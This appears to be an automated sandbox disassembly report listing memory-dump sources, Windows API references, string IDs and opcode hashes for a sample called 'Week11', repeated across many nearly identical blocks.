                                • Instruction Fuzzy Hash: BFD1E5A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58B66

                                Control-flow Graph

                                [control-flow graph image: entry block 405cd5-405fde; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 9d488ae4a9977ddc856495bf7056b88acf971c96a005eb6715a23b0bb3474d66
                                • Instruction ID: fb7537abd84aad0aac74a9ed5fb5fb3f073c78c9072d4569adba0840b0a107cf
                                • Opcode Fuzzy Hash: 9d488ae4a9977ddc856495bf7056b88acf971c96a005eb6715a23b0bb3474d66
                                • Instruction Fuzzy Hash: 1DD1E6A1D093989EF720CA24DC44BEB7B75EF91304F0441FAD48D66282D67E1FC58B66

                                Control-flow Graph

                                [control-flow graph image: entry block 405cb0-405fde; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 211d3e3088454342fa301326de96d46ee4d415014c573bff17096ffaa882fa93
                                • Instruction ID: 92b6b2dc2a0997ca6f386cd95b23f20d0ec3022758b2952666fde0429e6e074c
                                • Opcode Fuzzy Hash: 211d3e3088454342fa301326de96d46ee4d415014c573bff17096ffaa882fa93
                                • Instruction Fuzzy Hash: 77D1E5A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
                                • Instruction ID: 452740b263be536241ad283bf3e93c330d5add207dfb2093bca605b81ef60336
                                • Opcode Fuzzy Hash: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
                                • Instruction Fuzzy Hash: 22A1E4A1D092988EF720C624CC44BEA7B75EF92304F0441FAD48D6B282D77E1FD58B66
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
                                • Instruction ID: 89fd3b04d2d4baae8646865ee7f87ad83dff50b2bf9fe7a18cfbcaf80e498f22
                                • Opcode Fuzzy Hash: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
                                • Instruction Fuzzy Hash: 5962DDB1E046688BEB248B14DC80BEABBB1EF85304F1481FAD84D67641D6785EC6CF56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
                                • Instruction ID: bfe099a527f20717cc112ed4ff80b82e44660bd6727fc85cc469a95e5c3239d1
                                • Opcode Fuzzy Hash: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
                                • Instruction Fuzzy Hash: A242D0B1D04668CBEB248B14DC84BEABBB5EB81314F1480FAD80D97681D63D5EC6CF56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: =E8K$AFH6$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-2295883863
                                • Opcode ID: 05fd5026d9f72dd830fdd9a0d0ff75d43cd43a3017a240becf6162473d2c75f3
                                • Instruction ID: a97093da89676716a8d50661d30509100d59c45049f2c21821849b6fce5cbb74
                                • Opcode Fuzzy Hash: 05fd5026d9f72dd830fdd9a0d0ff75d43cd43a3017a240becf6162473d2c75f3
                                • Instruction Fuzzy Hash: 1922EDB5D052688FEB20CB15DC84BEAB7B6EF84304F0480EAD84DA7281D6799EC1CF55
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: d53cdc5a62e6100fd4c838c1b2d9beb7b3b2ac7e4cc2a6cf1de0deaf6661ff5b
                                • Instruction ID: cdb8cd24e33742dcffeaaf835e1a9c09254eb8ab88cd9363f2c2e4cdbd5fece7
                                • Opcode Fuzzy Hash: d53cdc5a62e6100fd4c838c1b2d9beb7b3b2ac7e4cc2a6cf1de0deaf6661ff5b
                                • Instruction Fuzzy Hash: 980201B2D046A88BE7208B24DC44BEABB75EF81300F1540FAD84D67681E67D5EC6CF56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 821dc142a8d940dff084096b8d6f38323c6875251b48bc54231b006069619d9c
                                • Instruction ID: 47569f1af290621fa2d33efe83f452727158299265086f5602c62eab89cc8f84
                                • Opcode Fuzzy Hash: 821dc142a8d940dff084096b8d6f38323c6875251b48bc54231b006069619d9c
                                • Instruction Fuzzy Hash: 780201B2D046A88AE7208B24DC44BEABB75EF81300F1140FED84D67681E67D5EC6CF56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: cc2dd810cd331d2e53c09a30ef1bdddba05b08bcfdc00e1e80ab604d20d2b156
                                • Instruction ID: 6066a46934eae4e9956472194b6b85615ff0f8365c8496f2ed21f4ca1acc74fe
                                • Opcode Fuzzy Hash: cc2dd810cd331d2e53c09a30ef1bdddba05b08bcfdc00e1e80ab604d20d2b156
                                • Instruction Fuzzy Hash: A2F103B2D086A88BE7208B25DC44BEABB75EF81300F1580FED44D57682D63D5EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a82194ad6fe9a671fb0c5b0c5200d2debdfd3b86ac4ac1da569667138ab546c5
                                • Instruction ID: 5a287a7c10a4f28cadd7821dd97a0960b6671d0bb999b214bae59d46f241ca3b
                                • Opcode Fuzzy Hash: a82194ad6fe9a671fb0c5b0c5200d2debdfd3b86ac4ac1da569667138ab546c5
                                • Instruction Fuzzy Hash: 49F103B2D046A88BE7208B24DC44BEABB75EB91300F1540FED44D97682D63D5EC68B56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 4c1e5d2152ac2a50194966f8244a2cbeeb43be3d1514b432c64ae83dede3c145
                                • Instruction ID: 5a825557b8c40355e8bfd9e98ed7fb2aca36644187dafd19f575952df63b95ed
                                • Opcode Fuzzy Hash: 4c1e5d2152ac2a50194966f8244a2cbeeb43be3d1514b432c64ae83dede3c145
                                • Instruction Fuzzy Hash: ACF102B2D086A88BE7208B24DC44BEABB75EF91300F1540FED44D97682D63D5EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
                                • Instruction ID: ab020383999a283389cd67a6ff597167e4e1049f29cda5c4bfa3cafdda48b262
                                • Opcode Fuzzy Hash: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
                                • Instruction Fuzzy Hash: 55F101B2D086A88BE7208B24DC44BEABB75EB81300F1540FED44D57682D67D5EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: e3d7df320cd93f5d790a4784ae8815276f09b21c4c9268d6aab76a9057aec146
                                • Instruction ID: edd7c9ead9ad02c5a3cd88301e0f370e987421c74df786517860b140cd6ff897
                                • Opcode Fuzzy Hash: e3d7df320cd93f5d790a4784ae8815276f09b21c4c9268d6aab76a9057aec146
                                • Instruction Fuzzy Hash: 57F112B2D086A88BE7208B24DC44BEABB75EF91300F1540FED44D97682D63D4EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 8973e00ffd1e03b0c02efc8b4891ac6aa2966b39080549be4a6a6fbbb7e11aa4
                                • Instruction ID: 636df44bf019de9ee138f451fd0323d0dbb2bec25e6fc492c377fb333e437c2f
                                • Opcode Fuzzy Hash: 8973e00ffd1e03b0c02efc8b4891ac6aa2966b39080549be4a6a6fbbb7e11aa4
                                • Instruction Fuzzy Hash: 5AE122B2D086A88BE7208B24DC44BEABB75EF81300F1540FED44D97682D67D4EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
                                • Instruction ID: dfe428614fd70bdd0cef406a9c2b7360cb8437dde5c0f67b8ddb5a57a438494e
                                • Opcode Fuzzy Hash: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
                                • Instruction Fuzzy Hash: EDD134B2D086A89BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
                                • Instruction ID: 38d378ff760fc7cf00bfdc99d61b068728ee53e393d52e13f68f0f01335c8ffb
                                • Opcode Fuzzy Hash: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
                                • Instruction Fuzzy Hash: 93D134B2D086A88BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
